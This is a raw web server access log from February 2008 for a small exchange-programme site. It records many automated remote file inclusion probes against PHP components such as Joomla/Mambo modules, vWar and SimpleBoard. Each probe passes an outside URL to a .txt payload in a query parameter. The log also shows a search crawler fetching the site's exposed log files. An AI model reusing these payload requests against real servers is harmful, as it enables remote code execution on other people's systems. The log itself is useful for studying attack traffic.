200.29.0.28 - - [25/Feb/2008:04:53:21 -0800] "GET //includes/db_adodb.php?baseDir=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
200.29.0.28 - - [25/Feb/2008:04:53:21 -0800] "GET /logs//includes/db_adodb.php?baseDir=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
200.29.0.28 - - [25/Feb/2008:04:53:26 -0800] "GET //includes/db_connect.php?baseDir=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.toulouseangloexchange.com"
200.29.0.28 - - [25/Feb/2008:04:53:26 -0800] "GET /logs//includes/db_connect.php?baseDir=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.toulouseangloexchange.com"
202.142.220.82 - - [25/Feb/2008:04:53:26 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
202.142.220.82 - - [25/Feb/2008:04:53:27 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
202.142.220.82 - - [25/Feb/2008:04:53:28 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
202.143.142.163 - - [25/Feb/2008:04:54:18 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
202.143.142.163 - - [25/Feb/2008:04:54:30 -0800] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.18.207.64 - - [25/Feb/2008:04:54:38 -0800] "GET //components/com_simpleboard/modifyform.html?code=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
200.111.157.66 - - [25/Feb/2008:04:54:41 -0800] "GET /logs/%3Cwbr%20/%3Eaccess.log//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.111.157.66 - - [25/Feb/2008:04:54:41 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.111.157.66 - - [25/Feb/2008:04:54:42 -0800] "GET /logs/%3Cwbr%20//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
84.18.207.64 - - [25/Feb/2008:04:54:45 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
201.31.30.226 - - [25/Feb/2008:04:54:53 -0800] "GET /payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.53.147.60 - - [25/Feb/2008:04:56:26 -0800] "GET //tools/send_reminders.php?includedir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
208.53.147.60 - - [25/Feb/2008:04:56:26 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
208.53.147.60 - - [25/Feb/2008:04:56:26 -0800] "GET //tools/send_reminders.php?includedir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.toulouseangloexchange.com"
208.53.147.60 - - [25/Feb/2008:04:56:26 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.toulouseangloexchange.com"
208.53.147.60 - - [25/Feb/2008:04:56:26 -0800] "GET //tools/send_reminders.php?includedir=http://www.randdesign.de/ppoint/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
208.53.147.60 - - [25/Feb/2008:04:56:26 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.randdesign.de/ppoint/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
200.96.247.163 - - [25/Feb/2008:04:56:27 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
200.96.247.163 - - [25/Feb/2008:04:56:33 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.84.245.145 - - [25/Feb/2008:04:56:55 -0800] "GET //tools/send_reminders.php?includedir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.toulouseangloexchange.com"
80.84.245.145 - - [25/Feb/2008:04:56:55 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.toulouseangloexchange.com"
80.84.245.145 - - [25/Feb/2008:04:56:55 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
80.84.245.145 - - [25/Feb/2008:04:56:55 -0800] "GET //tools/send_reminders.php?includedir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
80.84.245.145 - - [25/Feb/2008:04:56:55 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.randdesign.de/ppoint/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.toulouseangloexchange.com"
80.84.245.145 - - [25/Feb/2008:04:56:55 -0800] "GET //tools/send_reminders.php?includedir=http://www.randdesign.de/ppoint/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.toulouseangloexchange.com"
84.18.207.64 - - [25/Feb/2008:04:57:23 -0800] "GET //components/com_simpleboard/error.php?dir=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.184.96.158 - - [25/Feb/2008:04:57:26 -0800] "GET /index3.php?page=http://cfemp.com/pdf/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
216.184.96.158 - - [25/Feb/2008:04:57:26 -0800] "GET /logs/index3.php?page=http://cfemp.com/pdf/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
84.18.207.64 - - [25/Feb/2008:04:57:34 -0800] "GET //components/com_simpleboard/admin.php?include_path=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.30.216.106 - - [25/Feb/2008:04:57:35 -0800] "GET /logs/access_080114.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
222.239.78.91 - - [25/Feb/2008:04:58:27 -0800] "GET /logs/access_071217.log/index.php?_REQUEST=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.119.152.152 - - [25/Feb/2008:05:00:03 -0800] "GET /appserv/main.php?appserv_root=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.193.215.56 - - [25/Feb/2008:05:00:15 -0800] "GET //tools/send_reminders.php?includedir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
213.193.215.56 - - [25/Feb/2008:05:00:15 -0800] "GET //tools/send_reminders.php?includedir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
213.193.215.56 - - [25/Feb/2008:05:00:16 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
213.193.215.56 - - [25/Feb/2008:05:00:16 -0800] "GET //tools/send_reminders.php?includedir=http://www.randdesign.de/ppoint/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
213.193.215.56 - - [25/Feb/2008:05:00:17 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
213.193.215.56 - - [25/Feb/2008:05:00:17 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.randdesign.de/ppoint/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
72.30.216.101 - - [25/Feb/2008:05:00:47 -0800] "GET /logs/access_080107.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
84.18.207.64 - - [25/Feb/2008:05:01:52 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
84.18.207.64 - - [25/Feb/2008:05:01:52 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
84.18.207.64 - - [25/Feb/2008:05:01:52 -0800] "GET /logs/access.log//components/com_simpleboard/modifyform.html?code=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
84.18.207.64 - - [25/Feb/2008:05:01:52 -0800] "GET /logs//components/com_simpleboard/modifyform.html?code=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
202.142.220.82 - - [25/Feb/2008:05:02:05 -0800] "GET /logs/access_080127.log/?mosConfig_absolute_path=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
202.142.220.82 - - [25/Feb/2008:05:02:06 -0800] "GET /?mosConfig_absolute_path=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 200 919 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
202.142.220.82 - - [25/Feb/2008:05:02:06 -0800] "GET /logs/?mosConfig_absolute_path=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 200 3941 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
80.237.158.11 - - [25/Feb/2008:05:02:39 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.237.158.11 - - [25/Feb/2008:05:02:40 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.237.158.11 - - [25/Feb/2008:05:02:58 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
84.18.207.64 - - [25/Feb/2008:05:04:21 -0800] "GET /logs/access.log//components/com_simpleboard/admin.php?include_path=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
84.18.207.64 - - [25/Feb/2008:05:04:21 -0800] "GET /logs//components/com_simpleboard/admin.php?include_path=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
84.18.207.64 - - [25/Feb/2008:05:04:27 -0800] "GET /logs/access.log//components/com_simpleboard/error.php?dir=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
84.18.207.64 - - [25/Feb/2008:05:04:27 -0800] "GET /logs//components/com_simpleboard/error.php?dir=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.15.10.90 - - [25/Feb/2008:05:04:43 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/garasi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.toulouseangloexchange.com"
67.15.10.90 - - [25/Feb/2008:05:04:43 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/garasi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.toulouseangloexchange.com"
89.248.101.69 - - [25/Feb/2008:05:05:22 -0800] "GET /logs/access.log/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.248.101.69 - - [25/Feb/2008:05:05:22 -0800] "GET /index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.248.101.69 - - [25/Feb/2008:05:05:27 -0800] "GET /logs/access.log/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.248.101.69 - - [25/Feb/2008:05:05:27 -0800] "GET /logs/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.248.101.69 - - [25/Feb/2008:05:05:27 -0800] "GET /logs/access_080107.log/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.248.101.69 - - [25/Feb/2008:05:05:27 -0800] "GET /index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.248.101.69 - - [25/Feb/2008:05:05:27 -0800] "GET /logs/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.248.101.69 - - [25/Feb/2008:05:05:28 -0800] "GET /logs/access_080107.log/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
84.18.207.64 - - [25/Feb/2008:05:07:42 -0800] "GET /logs/access_071224.log//components/com_simpleboard/modifyform.html?code=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
84.18.207.64 - - [25/Feb/2008:05:08:16 -0800] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
200.111.157.66 - - [25/Feb/2008:05:08:21 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.195.58.160 - - [25/Feb/2008:05:08:36 -0800] "GET /logs/access.log HTTP/1.0" 200 93066 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
67.195.58.184 - - [25/Feb/2008:05:09:52 -0800] "GET /logs/ HTTP/1.0" 200 3925 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
67.195.58.169 - - [25/Feb/2008:05:10:12 -0800] "GET /logs/access_071231.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
216.75.63.66 - - [25/Feb/2008:05:10:23 -0800] "GET //index.php?theme=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.toulouseangloexchange.com"
216.75.63.66 - - [25/Feb/2008:05:10:24 -0800] "GET /logs//index.php?theme=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.toulouseangloexchange.com"
84.18.207.64 - - [25/Feb/2008:05:10:25 -0800] "GET /logs/access_071224.log//components/com_simpleboard/error.php?dir=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
124.161.97.124 - - [25/Feb/2008:05:10:37 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.18.207.64 - - [25/Feb/2008:05:10:43 -0800] "GET /logs/access_071224.log//components/com_simpleboard/admin.php?include_path=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
202.142.220.82 - - [25/Feb/2008:05:10:44 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
80.67.21.105 - - [25/Feb/2008:05:11:07 -0800] "GET /logs/index3.php?page=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.toulouseangloexchange.com"
80.67.21.105 - - [25/Feb/2008:05:11:16 -0800] "GET /index3.php?page=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.toulouseangloexchange.com"
68.76.31.154 - - [25/Feb/2008:05:11:42 -0800] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
68.76.31.154 - - [25/Feb/2008:05:11:42 -0800] "GET //Neos_Chronos/header.php?base_folder=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.72.117.141 - - [25/Feb/2008:05:12:35 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_071231.log//tools/send_reminders.php?includedir=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.72.117.141 - - [25/Feb/2008:05:12:35 -0800] "GET //tools/send_reminders.php?includedir=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.72.117.141 - - [25/Feb/2008:05:12:35 -0800] "GET /logs/%3Cwbr%20//tools/send_reminders.php?includedir=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.185.237.35 - - [25/Feb/2008:05:12:58 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_071231.log//tools/send_reminders.php?includedir=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.185.237.35 - - [25/Feb/2008:05:12:59 -0800] "GET //tools/send_reminders.php?includedir=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.185.237.35 - - [25/Feb/2008:05:13:00 -0800] "GET /logs/%3Cwbr%20//tools/send_reminders.php?includedir=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
201.35.66.58 - - [25/Feb/2008:05:13:06 -0800] "GET /?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 919 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.76.31.154 - - [25/Feb/2008:05:13:18 -0800] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
68.76.31.154 - - [25/Feb/2008:05:13:18 -0800] "GET //Neos_Chronos/header.php?base_folder=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
130.161.158.3 - - [25/Feb/2008:05:14:32 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://arcadiaz.free.fr/map/mambo?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.toulouseangloexchange.com"
130.161.158.3 - - [25/Feb/2008:05:14:32 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://arcadiaz.free.fr/map/mambo?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.toulouseangloexchange.com"
208.70.184.57 - - [25/Feb/2008:05:14:34 -0800] "GET /logs/access_080211.log/?cms[support]=1&cms[tngpath]=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.70.184.57 - - [25/Feb/2008:05:14:34 -0800] "GET /?cms[support]=1&cms[tngpath]=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 200 919 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.70.184.57 - - [25/Feb/2008:05:14:35 -0800] "GET /logs/?cms[support]=1&cms[tngpath]=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 200 3941 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.20.54.118 - - [25/Feb/2008:05:15:21 -0800] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://avvvv.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
69.20.54.118 - - [25/Feb/2008:05:15:21 -0800] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://avvvv.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
208.70.184.57 - - [25/Feb/2008:05:15:23 -0800] "GET /logs/access.log/?cms[support]=1&cms[tngpath]=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
